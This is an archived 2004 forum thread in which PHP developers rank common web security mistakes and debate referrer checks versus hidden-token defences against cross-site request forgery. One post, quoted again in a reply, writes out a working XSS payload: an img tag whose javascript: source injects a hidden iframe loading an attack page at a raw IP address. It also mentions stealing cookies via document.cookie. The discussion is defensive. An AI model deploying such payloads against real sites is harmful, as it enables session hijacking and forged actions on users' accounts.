There's my draft list of the top ten PHP security issues. As you can see,
there's only nine right now. I've ranked them based on how readily the
vulnerability can be exploited. This is the reason why the client-side
scripting vulnerabilities are listed 2, 3, and 4, while SQL injection is
listed 7. Listed as number 1 is the arguably the lamest mistake in all
web-programming: pulling information from the database based on a
primary-key passed through the URL without any kind of access check. Because
even someone with no programming knowledge can take advantage of this hole,
it takes the top spot.
[drum roll]
1. Revealing private information without access check
2. Displaying user-provided text without escaping HTML special
characters
3. Allowing users to supply a URL for an image
4. Processing form data without checking the page referrer
5. Copying an uploaded file into a web-accessible directory
6. Using a GET/POST variable as parameter to include/require
7. Inserting GET/POST variables into SQL statements without validation
8. Using session_registe r() with sensitive variables
9. Performing restricted operations in the global scope of an include
file
The use of register_global s is not on the list, as the potential problems
are effectively covered by item 6, 7, 8, and 9 (or so I think).
I'll write up a more detailed description for each of these, along with
possible solutions, and post it somewhere on the net. Hopefully it'll be
interesting reading for beginners to the language. Thanks to all who
participated in the original thread. Additional comments are definitely
welcomed. 12 2241
On Wed, 11 Feb 2004 22:38:17 -0500, "Chung Leong"
<ch***********@ hotmail.com> wrote: There's my draft list of the top ten PHP security issues. As you can see, there's only nine right now. I've ranked them based on how readily the vulnerabilit y can be exploited. This is the reason why the client-side scripting vulnerabilities are listed 2, 3, and 4, while SQL injection is listed 7. Listed as number 1 is the arguably the lamest mistake in all web-programming: pulling information from the database based on a primary-key passed through the URL without any kind of access check. Because even someone with no programming knowledge can take advantage of this hole, it takes the top spot.
[drum roll]
1. Revealing private information without access check 2. Displaying user-provided text without escaping HTML special characters 3. Allowing users to supply a URL for an image 4. Processing form data without checking the page referrer 5. Copying an uploaded file into a web-accessible directory 6. Using a GET/POST variable as parameter to include/require 7. Inserting GET/POST variables into SQL statements without validation 8. Using session_registe r() with sensitive variables 9. Performing restricted operations in the global scope of an include file
10. Putting the file that contains your database connection info in a
web-accessible directory without adequate protection.
I remember once going to http://www.experts-exchange.com/ . They use
JSPs and we could read all their code. Their server must have been
misconfigured. Oops! About an hour later it was back to normal.
--
David ( @priz.co.uk )
On Wed, 11 Feb 2004 22:38:17 -0500, Chung Leong wrote:
[ snip ] 4. Processing form data without checking the page referrer
Hmm.. and if someone's "firewall" (we're talking windoze here) blocks /
changes the referrer as part of it's "user privacy / security setting"?
Agnitum Outpost for example can block the referrer by replacing it with
'**BLOCKED BY OUTPOST**' or something.
I never used that feature on windoze.. but I know that many people do
judging from my server logs.
I know you're not suggesting _just_ using the referrer for validation, but
IMO, the referrer header is next to useless for any consideration. Agreed,
people are unlikely to want to try and hijack their own account, but they
may do this as a matter of course (blocking the referrer header) and thus
the system would fall over for IMO, a "false-positive".
Just my £0.02 worth =)
Regards,
Ian
--
Ian.H
digiServ Network
London, UK http://digiserv.net/
Uzytkownik "Ian.H" <ia*@WINDOZEdig iserv.net> napisal w wiadomosci
news:pa******** *************** *****@hybris.di giserv.net... Hmm.. and if someone's "firewall" (we're talking windoze here) blocks / changes the referrer as part of it's "user privacy / security setting"? Agnitum Outpost for example can block the referrer by replacing it with '**BLOCKED BY OUTPOST**' or something.
Hmmm...Interest ing. I didn't know firewalls does that.
I know you're not suggesting _just_ using the referrer for validation, but IMO, the referrer header is next to useless for any consideration. Agreed, people are unlikely to want to try and hijack their own account, but they may do this as a matter of course (blocking the referrer header) and thus the system would fall over for IMO, a "false-positive".
Well, I don't know how else you can stop the cross-site scripting
vulnerability in question, because there is no other distinction between a
legitimate POST request and a malious one originating from a different site
from the HTTP referrer. We can perhaps work around the firewall/proxy issue
by rejecting only requests where there is a valid URL and it's not a page on
the local server.
Recapping for those who weren't following the original thread, an attack
works as followed:
1. At a web forum, an attacker post a URL to a page he controls
2. Victim logs into web forum
3. Victim sees link, clicks on it. The browser goes to the attack page
4. The attack page does a POST to a script at the web forum. The browser
supplies the cookie containing the PHP session id because it sees that the
web forum is its creator. The script sees that the victim is logged in and
happily processes the request. To hide what's going on, the attacker can put
the page that does the POST in an invisible iframe (meanwhile, the victim
happily reads what's on the main page). Multiple iframes can be used to
maximize the damage.
If item 2 or 3 on the list are present at the site, the attack can be
launched without the user even clicking the link. The following img tag, for
example, would open up an invisible iframe automatically within the current
document:
<img
src="javascript :d=document;a=d .createElement( 'IFRAME');a.sty le.display='non e
';a.src='http://192.58.221.243/attack.php';d.b ody.appendChild (a);m=d.images;
for(i=0;i<m.len gth;i++){a=m[i];if(a.src.match (/^javascript/))a.src='http://w
ww.google.com/images/logo.gif';}">
In this situation though, it's easier to just steal the cookie (accessible
via document.cookie ) and hijack the PHP session.
Hi Chung!
On Thu, 12 Feb 2004 19:10:55 -0500, "Chung Leong"
<ch***********@ hotmail.com> wrote: Uzytkownik "Ian.H" <ia*@WINDOZEdig iserv.net> napisal w wiadomosci news:pa******* *************** ******@hybris.d igiserv.net... Hmm.. and if someone's "firewall" (we're talking windoze here) blocks / changes the referrer as part of it's "user privacy / security setting"? Agnitum Outpost for example can block the referrer by replacing it with '**BLOCKED BY OUTPOST**' or something. Hmmm...Interes ting. I didn't know firewalls does that.
Norton Internet Security 2001 did it. I know you're not suggesting _just_ using the referrer for validation, but IMO, the referrer header is next to useless for any consideration. Agreed, people are unlikely to want to try and hijack their own account, but they may do this as a matter of course (blocking the referrer header) and thus the system would fall over for IMO, a "false-positive". Well, I don't know how else you can stop the cross-site scripting vulnerabilit y in question, because there is no other distinction between a legitimate POST request and a malious one originating from a different site from the HTTP referrer. We can perhaps work around the firewall/proxy issue by rejecting only requests where there is a valid URL and it's not a page on the local server.
Hmm. I don't want to rely on REFERERs as well. I would consider a POST
request as legitimate, if the user is logged in, and not legitimate,
if it seems to run automatic, eg. tries to POST constantly.
Other decisions, such as security against SQL injection need to be
made on content, because people might wanna run a forum about SQL
injection code. Again, why not require the user to log in.
Recapping for those who weren't following the original thread, an attack works as followed:
1. At a web forum, an attacker post a URL to a page he controls 2. Victim logs into web forum 3. Victim sees link, clicks on it. The browser goes to the attack page 4. The attack page does a POST to a script at the web forum. The browser supplies the cookie containing the PHP session id because it sees that the web forum is its creator. The script sees that the victim is logged in and happily processes the request. To hide what's going on, the attacker can put the page that does the POST in an invisible iframe (meanwhile, the victim happily reads what's on the main page). Multiple iframes can be used to maximize the damage.
If item 2 or 3 on the list are present at the site, the attack can be launched without the user even clicking the link. The following img tag, for example, would open up an invisible iframe automatically within the current document:
<img src="javascrip t:d=document;a= d.createElement ('IFRAME');a.st yle.display='no ne ';a.src='htt p://192.58.221.243/attack.php';d.b ody.appendChild (a);m=d.images; for(i=0;i<m.le ngth;i++){a=m[i];if(a.src.match (/^javascript/))a.src='http://w ww.google.co m/images/logo.gif';}">
Ok, I didn't follow closely enough. Interesting setup, but I would
blame the victim.
HTH, Jochen
--
Jochen Daum - Cabletalk Group Ltd.
PHP DB Edit Toolkit -- PHP scripts for building
database editing interfaces. http://sourceforge.net/projects/phpdbedittk/
"Chung Leong" <ch***********@ hotmail.com> wrote in message news:<lr******* *************@c omcast.com>... Uzytkownik "Ian.H" <ia*@WINDOZEdig iserv.net> napisal w wiadomosci news:pa******** *************** *****@hybris.di giserv.net... Hmm.. and if someone's "firewall" (we're talking windoze here) blocks / changes the referrer as part of it's "user privacy / security setting"? Agnitum Outpost for example can block the referrer by replacing it with '**BLOCKED BY OUTPOST**' or something. Hmmm...Interest ing. I didn't know firewalls does that. https://proxify.com/
<snip> In this situation though, it's easier to just steal the cookie (accessible via document.cookie ) and hijack the PHP session.
IMHO, if our login system is secure
(<http://martin.f2o.org/php/login>), we can avoid the session
hijacking.
--
"Success = 10% sweat + 90% tears"
If you live in USA, please support John Edwards.
Email: rrjanbiah-at-Y!com
Uzytkownik "R. Rajesh Jeba Anbiah" <ng**********@r ediffmail.com> napisal w
wiadomosci news:ab******** *************** ***@posting.goo gle.com... "Chung Leong" <ch***********@ hotmail.com> wrote in message
news:<lr******* *************@c omcast.com>... Uzytkownik "Ian.H" <ia*@WINDOZEdig iserv.net> napisal w wiadomosci news:pa******** *************** *****@hybris.di giserv.net...
IMHO, if our login system is secure (<http://martin.f2o.org/php/login>), we can avoid the session hijacking.
Not really, because the hijacking occurs at the client-side. Don't forget
that at the end of the day, you're still relying on the browser to keep the
cookie (by extension, your session) safe. If the browser behaves
promisciously with its cookies--which it is, by making them accessible via
Javascript--then you have problems.
For a system to be secured, every part of it must be secured. Yes, we need a
secured login system, but we also need to protect the browser from malicious
Javascript.
Hi Jochen!
Uzytkownik "Jochen Daum" <jo*********@ca ns.co.nz> napisal w wiadomosci
news:qd******** *************** *********@4ax.c om... Other decisions, such as security against SQL injection need to be made on content, because people might wanna run a forum about SQL injection code. Again, why not require the user to log in.
The user is logged in. The problem is that the attacker can control his
browser using Javascript and do nasty things as him.
I guess a better solution to this problem would be to require the
accompaniment of an unique id, stored in a hidden, with every POST. The
receiving script would check the id posted against then one stored in the
session, and rejects the request if they don't match. That requires fixing
every form though. Checking the referrer is much easier.
Chung Leong writes: The user is logged in. The problem is that the attacker can control his browser using Javascript and do nasty things as him.
I guess a better solution to this problem would be to require the accompaniment of an unique id, stored in a hidden, with every POST. The receiving script would check the id posted against then one stored in the session, and rejects the request if they don't match. That requires fixing every form though.
That will almost work. What happens when the script, acting as a
user, requests a form page and thus receives the hidden number? To
close that hole every page must require that the unique number
supplied in the previous page is passed to it. External links do not
pass the unique number so those sites have no way of accessing your
secure pages. I'm pretty sure this would still be secure if you
passed the unique number in the query string.
The alternative is to vet all external links. It wouldn't be that
hard to automate a test.
--
__o Alex Farran
_`\<,_ Analyst / Programmer
(_)/ (_) www.alexfarran.com
Uzytkownik "Alex Farran" <al**@alexfarra n.com> napisal w wiadomosci
news:m3******** ****@alexfarran .com... That will almost work. What happens when the script, acting as a user, requests a form page and thus receives the hidden number? To close that hole every page must require that the unique number supplied in the previous page is passed to it. External links do not pass the unique number so those sites have no way of accessing your secure pages. I'm pretty sure this would still be secure if you passed the unique number in the query string.
Ok, I see I've been unwisely mixing up two vulnerabilities here. When the
attacker is able to inject Javascript into your page, your users are just
screwed. Now, let use restrict ourselves to the case where the only thing
the attack can do is post an URL (no difference whether it's a hyperlink or
text that users have to manually enter into the address box).
DOM/Javascript security operates on a simple premise: content on a page at a
site is only accessible to scripts originating from the same site. When the
user click on a link and go from say www.paradiso.org to www.inferno.com,
scripts at www.inferno.com do not have access to any thing--including the
hidden number in question--at www.paradiso.org. This is true even if Interno
loads Paradiso in an inframe.
Both your scheme and mine fall apart if the user opens new windows. The best
check is still the page referrer. Does anyone know if firewalls block all
referer headers or only absolute ones?
What we really need is a special kind of cookie (brownie?) that doesn't get
sent if the originating page isn't its creator.
The alternative is to vet all external links. It wouldn't be that hard to automate a test. --
__o Alex Farran _`\<,_ Analyst / Programmer (_)/ (_) www.alexfarran.com This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics |
by: Chris Mosser |
last post by:
I'm still somewhat new with php, only able to play with it now and again.
Anyway, I was recently sent an email about poss security flaws, not in php
itself but in my code on a site that I am working on. Here is a list of
security issues that poss exist and I'm just looking for other ways to
improve the overall security of the site.
*transactions
this site accepts transactions through IBILL. I need a way to validate
that after the...
|
by: grahamd |
last post by:
Who are the appropriate people to report security problems to
in respect of a module included with the Python distribution?
I don't feel it appropriate to be reporting it on general mailing
lists.
|
by: Angelos Karantzalis |
last post by:
Is there a way to set Permissions based on user roles by using some
configuration file for my application ?
I'm coming from a Java background, where that could very easily be
accomplished but although I've searched around MSDN I can't find a clear
answer to this ...
Thanks a lot guys,
Angel
|
by: Antony |
last post by:
I am currently writing an application (VB.NET) and I was thinking about all
the hype that seems to be given to security and if I should pay it any
attention or not.
My first thought was, nah, no need to worry about security because my app
will not include WEB services, thus won't be hosted, thus should not be
vulnerable for attack.
But then I thought, what happens if some hacker gets into a machine where my
app is running, finds a DLL...
|
by: Z D |
last post by:
Good Morning,
I was looking for some feedback, guidance, input, comments, suggestions or
just general thoughts on the following:
For our internal development, I'm trying to create a general, reusable
security framework that is very flexible. It would have to handle both
Authentication and Authorization. The access levels allowed on each 'object'
would be: View/Edit/Read/Write.
| |
by: chuckdfoster |
last post by:
I am developing an ASP.NET site where an site administrator can upload files
via ASP.NET into a Documents folder. These documents are then viewed by
site users. I used the MS KB article
http://support.microsoft.com/default.aspx?scid=kb;en-us;323245 to learn how
to do this.
Is there a security issue with this. If you are giving the ASPNET account
Read & Execute, List Folder Contents, Read, and Write permissions, then
could they not...
|
by: nancy |
last post by:
I am new to PHP but have done other programming
can someone please hold my hand and slowly talk me through some simple
security issues?
I have seen in PHP documents that there are 'strip slashes' commands and
so on but I dont understand where the security issues actually are.
i am writing some scripts that will shell out and call different linux
shell programs such as 'ls' or 'grep' or 'sed' and so on and possibly
update a 'mysql'...
|
by: Andrew Poulos |
last post by:
I don't have IE 7 but is it true that IE 7 prevents javascript from
playing audio without the user first responding positively to a dialog box?
I have an elearning app that uses audio which is controlled by a simple
player. I know it would annoy the client if the user had to click a
'play' button and then also click 'yes' in a dialog box.
Andrew Poulos
|
by: Ken Fine |
last post by:
I want to add the security question and answer security feature to the
ChangePassword control. I am aware that this functionality is built into the
PasswordRecovery tool. I have implemented the PasswordRecovery with a
Password reset required; a temporary password is sent to the account on
file. I want an extra layer of security to accommodate the very unlikely
contingency that someone's e-mail account is compromised. Challenging with
the...
|
by: marktang |
last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main usage, and What is the difference between ONU and Router. Let’s take a closer look !
Part I. Meaning of...
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can effortlessly switch the default language on Windows 10 without reinstalling. I'll walk you through it.
First, let's disable language synchronization. With a Microsoft account, language settings sync across devices. To prevent any complications,...
| |
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed.
This is as boiled down as I can make it.
Here is my compilation command:
g++-12 -std=c++20 -Wnarrowing bit_field.cpp
Here is the code in...
|
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth.
The Art of Business Website Design
Your website is...
|
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one.
At the time of converting from word file to html my equations which are in the word document file was convert into image.
Globals.ThisAddIn.Application.ActiveDocument.Select();...
|
by: adsilva |
last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
|
by: 6302768590 |
last post by:
Hai team
i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
| |
by: bsmnconsultancy |
last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...
| | |